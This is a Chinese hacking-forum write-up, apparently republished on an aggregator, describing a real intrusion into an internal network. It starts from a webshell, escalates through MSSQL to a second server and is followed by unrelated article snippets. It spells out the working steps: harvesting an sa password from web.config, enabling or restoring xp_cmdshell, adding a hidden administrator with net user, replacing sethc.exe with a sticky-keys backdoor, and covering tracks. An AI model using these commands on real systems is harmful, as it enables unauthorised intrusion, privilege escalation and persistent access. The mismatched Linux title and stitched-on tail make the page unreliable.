内网中入侵linux系统,MSSQL 入侵提权之内网渗透案例分析

图文:udb311

主题:MSSQL内网渗透案例分析

发表:黑白前线

描述:对于内网渗透技术一直感觉很神秘,手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术!本文敏感信息以屏蔽!密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行,再通过自己的灵活思维运用。

环境:2003 SERVER

IIS :6.0 支持php

数据库:MSSQL和MYSQL

网站类型:ASPX

本文重点讲述内网渗透提权部分,对于WEBSHELL不在描述。对于了解入侵渗透的朋友都知道,拿到webshell后服务器能否提权就要先找提权 的漏洞所在。从本站的角度来看,存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录,很 平常么。没现有SU和MYSQL之类的信息。

084105btX.jpg

E:盘可以浏览

F:盘可以浏览

本站ASPX 类型网站,使用的是MSSQL数据库。显示密码不是最高权限的用户,就是是个DB用户提权也不能马上到手。

084106fsw.jpg

再翻翻别的站点,目录可以浏览一个个找吧。发现一个目录web.config有SA用户

084106KOz.jpg

连接数据库信息:

Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****" 打开aspxspy,使用database连接功能。

084106BMc.jpg

登录成功,显示SA看来应该没有降权。

连接状态是MSSQL 2005,要先启xp_cmdshell.

084106yGw.jpg

接着执行下命令"whoami.html' target='_blank'>whoami"

084106sws.jpg

good,system 权限,下面就是添加一个账号了。。

Exec master.dbo.xp_cmdshell 'net user admin **** /add'

Exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

再看下3389端口是否开启

Exec master.dbo.xp_cmdshell 'stat.html' target='_blank'>netstat -ano'

084107Nju.jpg

OK,状态正常。

Exec master.dbo.xp_cmdshell 'ipconfig /all'显示配置是内网IP

通过域名解析到的IP连接3389,可以连接。

说明管理做了端口映射,这就不要转发端口了。省了很多功夫!

这才拿到了一台服务器的权限,从网站的SQL连接上不难发现内网还有SQL服务器。

渗透继续……

内网IP为200,同样是MSSQL SA权限。

084107tog.jpg

再利用aspxspy 数据库连接,

郁闷的事情发生了,不能连接。

[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒绝访问。

按道理讲数据库能使用的情况下应该可以成功连接上的,难道没有配置TCP/IP访问数据库?疑问产生了,无耐之下通过3389上到服务器上来试试。服务器安装了MSSQL,有查询分析器和企业管理器。这又成了我们的工具。呵呵!

SQL分析器连接之,仍然无法连接。

084107THu.jpg

先测试下所在的MSSQL服务器机器的存在性。

084107K26.jpg

成功响应,说明服务器存在。

运行mstsc试着3389连接下,显示了一个xp的界面。比较郁闷耶。

试下名称解析服务。。。

点击浏览一看,这么多MSSQL服务器名还真不知道哪台是的。观察下发现200和IP200的机器有些相近。输入SA及密码。

084107K0M.jpg

成功返回查询窗口。试下xp_cmdshell

发现不存在,恢复之

Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')

OK!

执行命令"whoami",虽然XP不支持whoami命令。

084108RXE.jpg

exec xp_cmdshell 'net user 123 123 /add'

提示系统错误。不是没权限添加。。。。不明真像了。。。

思路:开了3389可以用sethc.exe 替换来。。。

084108jfk.jpg

exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'替换之?

问题又来了,提示磁盘文件不足。

利用xp_dirtree查看下C盘

EXEC MASTER..XP_dirtree 'c:',1,1

0841080Ff.jpg

列出文件目录,删除一个数据库的备份

再执行exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'

084108RSt.jpg

提示一个文件被复制,说明成功。3389 5次shift未弹出。

再试下

exec xp_cmdshell 'net user 123 123 /add' 提示成功。原来开始是空间不足导致的系统错误啊。真像揭开!

exec xp_cmdshell 'net localgroup administrator 123 /add'

3389登录之。。

exec xp_cmdshell 'net user 123 /del'删除用户

内网还存在很多机器,此次渗透就此结束。。。

总结:内网从端口转发到外部连接,再从3389登录内部3389 跟跳板技术差不多。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/566415.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Linux】僵尸与孤儿 进程等待

目录 一,僵尸进程 1,僵尸进程 2,僵尸进程的危害 二,孤儿进程 1,孤儿进程 三,进程等待 1,进程等待的必要性 2,wait 方法 3,waitpid 方法 4,回收小结…

linux bool变量,Objective-C中的占位符,打印BOOL类型数据

常用的一些占位符:%:字符串占位符%d:整型%ld:长整型%f:浮点型%c:char类型%%:%的占位符尽管有那么多的占位符,但是好像没有发现BOOL型的数据的占位符,这也是比较纠结的地方,看了一下别人是怎么解决这个问题的…

c语言gets n,c语言中gets ,getschar 和fgets 的用法及三者之间的差别

满意答案wkmpbg846推荐于 2018.02.27采纳率:45% 等级:8已帮助:362人gets():原型:char *gets(char *buffer) ;功能:从stdlin中获取获取字符串一直到换行符或者遇到EOF为止,但换行符不被录取,会将换行符替换成‘\0’来…

android中svn插件安装,AndroidSDK安装SVN插件问题解决

工具版本信息:Eclipse4.2ADT23.0Subclipse1.10,插件安装地址:http://subclipse.tigris.org/update_1.10.x问题一报错信息如下:Cannot complete the install because one or more required items could not be found.Software being installed: Subversion Revision Graph 1.1.1…

鸿蒙系统的变化,鸿蒙系统没变化的背后

原标题:鸿蒙系统没变化的背后鸿蒙系统发布以后被很多人吐槽,说是没什么变化,和之前体验的安卓系统简直一模一样,真的失望至极。其实,鸿蒙系统还是从底层做出了改变,只不过没有变了界面和运行方式而已。那么…

三星s2 硬刷Android 8,三星T710(GALAXY Tab S2 8.0)一键救砖教程,轻松刷回官方系统...

三星T710(GALAXY Tab S2 8.0)手机变砖了怎么办?对于经常刷机的安卓玩家来说,碰到刷机失败导致三星T710(GALAXY Tab S2 8.0)手机无法启动甚至无法进入recovery都是在所难免的事,这个时候我们就需要用到奇兔线刷大师线刷救砖功能了,它能轻松实…

鸿蒙工业互联网,工业互联网 3D 展示平台

原标题:工业互联网 3D 展示平台项目简介产业园区占地约为 158.46 亩,现有生产车间两栋、研发楼一栋、检测楼一栋、食堂及倒班楼一栋、废品库一栋、门卫室两处、综合站房一处。主要从事电缆、电线的生产与加工。产业园区综合管理平台项目开发内容复杂&…

lean软件Android有吗,leanchat-android

LeanChat Android 客户端简介LeanChat 是 LeanCloud 实时通信 组件的 Demo,通过该应用你可以学习和了解 LeanCloud 实时通信功能。效果截图Leanchat 项目构成如果你从 github clone 速度很慢,可以从 这里 下载项目源码压缩包。部署创建应用注册并登录 Le…

华为系统10.0是鸿蒙吗,暂时忘记鸿蒙!华为EMUI 10.0发布时间确认:这才是主角...

原标题:暂时忘记鸿蒙!华为EMUI 10.0发布时间确认:这才是主角华为鸿蒙系统由于顶着“自研”的光环,自曝光以来便受到科技圈的追捧,虽并未推出但已经有“众星捧月”的迹象。媒体追逐鸿蒙系统自然是为了热度和流量&#x…

a4纸在html的像素,打印常识:A4纸张在显示器上应该要多少像素?

A4纸的尺寸是210mm*297mm,也就是21.0cm*29.7cm,而1英寸2.54cm,如果屏幕DPI分辨率为72像素/英寸,换算一下:相当于1cm可呈现 (72px/2.54cm) 28.34px下面是一些常用分辨率下A4纸在屏幕上的像素尺寸:分辨率是7…

wether.html5.qq.com,人教版英语九年级全一册Unit 1单元测试卷及参考答案解析(含听力...

UNIT 1 达标测试卷时间:120分钟 满分:150分第一卷 听力部分(30分)一、关键词语选择(共5小题;每小题1分,满分5分)1. A. note B.nose C. notice2. A. repair B. report C.repeat3. A. widely B. quickly C.wisely4.A. screen B.s…

世界上覆盖范围最广的计算机网络是 ( ),世界上覆盖范围最广的计算机网络是()。...

摘要:部会天翼自动格将俱乐取消员资客户,世界上覆下列情况哪些出现时。围最包单包工总承责任单位对分安全程的承担位和分包生产。计算机网包分政基作业工分建筑础设程施为(劳务和市)和房屋分包施工。...部会天翼自动格将俱乐取消员资客户,世界…

CAM是利用计算机,利用DroidCam将手机摄像头打造成计算机摄像头

利用DroidCam将手机摄像头打造成电脑摄像头1.目的现在许多同学的电脑上没有摄像头,但是随着智能手机的普及,大多数同学都有带摄像头的手机。而智能手机的摄像头比电脑的usb摄像头的效果好很多。那可不可以把手机摄像头用在电脑上来网络聊天呢&#xff0c…

电大计算机应用技术基础视频,电大形成性测评-计算机应用技术基础01

电大形成性测评-计算机应用技术基础01 (7页)本资源提供全文预览,点击全文预览即可全文预览,如果喜欢文档就下载吧,查找使用更方便哦!15.9 积分01任务-在线作业试卷总分:100 测试时间:-- 单项选择题 …

北大计算机博进高校,他是北大第一位博士,留校任教却连做三件“傻事”,博导都没评上...

自北大1898年创办至今,早已度过了风雨百年,一路发展、创造辉煌,令人慨叹不已。身为我国名校的门面招牌之一,北大底蕴深厚、实力强劲,校园环境优美、师资力量雄厚,不知是多少学子可望而不可及的理想学府。在…

计算机打印过的文件在哪找到,请问如何在电脑里查找已经打印过的文件

满意答案苏mmkk2013.07.06采纳率:45% 等级:11已帮助:20600人如果你的系统是XP 的话查找电脑名称:在桌面“我的电脑”上点右键。第二个选项卡上有“计算机名”上面显示的有完整的计算机名,如果想更改的话&#xff0c…

tomcat服务器运行环境,win7怎么配置Tomcat服务器环境|win7系统配置Tomcat服务器环境的方法...

‍‍许多用户询问说win7旗舰版系统怎么配置Tomcat服务器环境?tomcat是什么?它一款轻量级免费开源的Web服务器,我们再使用tomcat时,最好配置一下环境变量。很多新手用户不知道怎么配置Tomcat服务器环境,安装配置Tomcat的方法和java有些相同&am…

心脏遥测监控系统服务器,基于ARM7的心电采集与远程传输系统设计

该系统设计的监护模块与医院内心电监护中心的心电实时监控服务器都工作于客户/服务器模式下。在工作状态下,心电数据接收转发器客户端应用程序,首先初始化以太网接口,然后主动与医院内心电实时监控服务器建立连接;连接成功后&…

linux装服务器系统,linux服务器系统安装

linux服务器系统安装 内容精选换一换安装完操作系统后的临时云服务器需要进行相关配置,并安装原生的XEN和KVM驱动,才能保证后续创建的云服务器正常使用。该任务指导用户完成Linux云服务器的相关配置与驱动安装,从而创建为Linux系统盘镜像。配…

服务器bios修改uefi,服务器 uefi bios设置

服务器 uefi bios设置 内容精选换一换对于不同的硬件设备,通过在BIOS中设置一些高级选项,可以有效提升服务器性能。服务器上的SMMU一般用来完成设备的地址转换,并且可以实现设备隔离,在虚拟化中很实用,但是在物理机测试…